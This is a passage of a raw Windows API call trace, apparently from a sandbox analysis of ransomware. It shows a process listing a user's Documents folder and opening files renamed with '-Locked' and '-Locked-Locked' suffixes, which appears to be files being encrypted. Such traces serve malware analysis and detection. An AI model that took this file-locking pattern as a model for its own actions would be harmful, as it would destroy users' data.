lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked", lpFilePart=0x0) returned 0x36 [0300.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.527] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.528] GetFileType (hFile=0x49c) returned 0x1 [0300.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.528] GetFileType (hFile=0x49c) returned 0x1 [0300.530] CloseHandle (hObject=0x49c) returned 1 [0300.530] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked", lpFilePart=0x0) returned 0x3c [0300.530] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", lpFilePart=0x0) returned 0x43 [0300.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.530] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.531] GetFileType (hFile=0x49c) returned 0x1 [0300.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.531] GetFileType (hFile=0x49c) returned 0x1 [0300.533] CloseHandle (hObject=0x49c) returned 1 [0300.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af19c) returned 1 [0300.533] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0300.533] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0300.534] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aeec4 | out: lpFindFileData=0x1aeec4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3368e5ec, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3368e5ec, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ab3ab5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ab3ab5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ab3ab5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked", cAlternateFileName="1FEG~2.XLS")) returned 1 [0300.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335e853e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335e853e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335e853e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked-Locked", cAlternateFileName="1FEG~1.XLS")) returned 1 [0300.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ace7f4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ace7f4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ace7f4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked", cAlternateFileName="2XKT2-~2.PPT")) returned 1 [0300.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335efa7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335efa7c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335efa7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked-Locked", cAlternateFileName="2XKT2-~1.PPT")) returned 1 [0300.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ae0e22, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ae0e22, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ae0e22, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked", cAlternateFileName="4YEBKI~2.XLS")) returned 1 [0300.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335f5e17, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335f5e17, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335f5e17, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked-Locked", cAlternateFileName="4YEBKI~1.XLS")) returned 1 [0300.537] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32af1d8c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32af1d8c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32af1d8c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked", cAlternateFileName="4GH0Y9~1.PDF")) returned 1 [0300.537] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335fbe0e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x335fbe0e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x335fbe0e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked-Locked", cAlternateFileName="4GH0Y9~2.PDF")) returned 1 [0300.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b00832, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b00832, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b00832, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked", cAlternateFileName="88Z1O5~2.DOC")) returned 1 [0300.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33602049, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33602049, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33602049, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked-Locked", cAlternateFileName="88Z1O5~1.DOC")) returned 1 [0300.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b119bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b119bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b119bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked", cAlternateFileName="9WUI5E~2.DOC")) returned 1 [0300.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336081fa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336081fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336081fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", cAlternateFileName="9WUI5E~1.DOC")) returned 1 [0300.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b22d39, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b22d39, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b22d39, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked", cAlternateFileName="AWNRFZ~2.PPT")) returned 1 [0300.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3360e292, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3360e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3360e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", cAlternateFileName="AWNRFZ~1.PPT")) returned 1 [0300.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b3156b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b3156b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b3156b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked", cAlternateFileName="AZYKAG~2.RTF")) returned 1 [0300.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3361452d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3361452d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3361452d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked-Locked", cAlternateFileName="AZYKAG~1.RTF")) returned 1 [0300.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b474bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b474bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b474bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked", cAlternateFileName="BFC~2.DOC")) returned 1 [0300.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3361a6d4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3361a6d4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3361a6d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked-Locked", cAlternateFileName="BFC~1.DOC")) returned 1 [0300.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b55fb6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b55fb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b55fb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked", cAlternateFileName="CERXR1~2.XLS")) returned 1 [0300.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336208d1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336208d1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336208d1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked-Locked", cAlternateFileName="CERXR1~1.XLS")) returned 1 [0300.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b63866, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b63866, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b63866, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0300.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33627dbf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33627dbf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33627dbf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0300.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b72239, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b72239, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b72239, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked", cAlternateFileName="EUNC2M~2.XLS")) returned 1 [0300.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3363059b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3363059b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3363059b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", cAlternateFileName="EUNC2M~1.XLS")) returned 1 [0300.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b831b0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b831b0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b831b0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked", cAlternateFileName="FQNOQA~2.XLS")) returned 1 [0300.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336367c9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336367c9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336367c9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", cAlternateFileName="FQNOQA~1.XLS")) returned 1 [0300.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ba8fd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ba8fd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ba8fd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked", cAlternateFileName="FUKBCY~2.PPT")) returned 1 [0300.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3363c98c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3363c98c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3363c98c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", cAlternateFileName="FUKBCY~1.PPT")) returned 1 [0300.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bc16b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bc16b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bc16b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked", cAlternateFileName="HBFGJD~1.DOC")) returned 1 [0300.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364520b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364520b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364520b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked-Locked", cAlternateFileName="HBFGJD~2.DOC")) returned 1 [0300.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd1558, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bd1558, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bd1558, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked", cAlternateFileName="HUM71H~2.PDF")) returned 1 [0300.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364edfc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364edfc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364edfc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked-Locked", cAlternateFileName="HUM71H~1.PDF")) returned 1 [0300.546] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0300.546] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32be4c72, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32be4c72, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32be4c72, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked", cAlternateFileName="JOED-0~2.PPT")) returned 1 [0300.546] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364edfc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364edfc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364edfc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked-Locked", cAlternateFileName="JOED-0~1.PPT")) returned 1 [0300.547] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bf97aa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bf97aa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bf97aa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked", cAlternateFileName="JYYUHN~2.OTS")) returned 1 [0300.547] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3366c3f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3366c3f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3366c3f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", cAlternateFileName="JYYUHN~1.OTS")) returned 1 [0300.547] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, 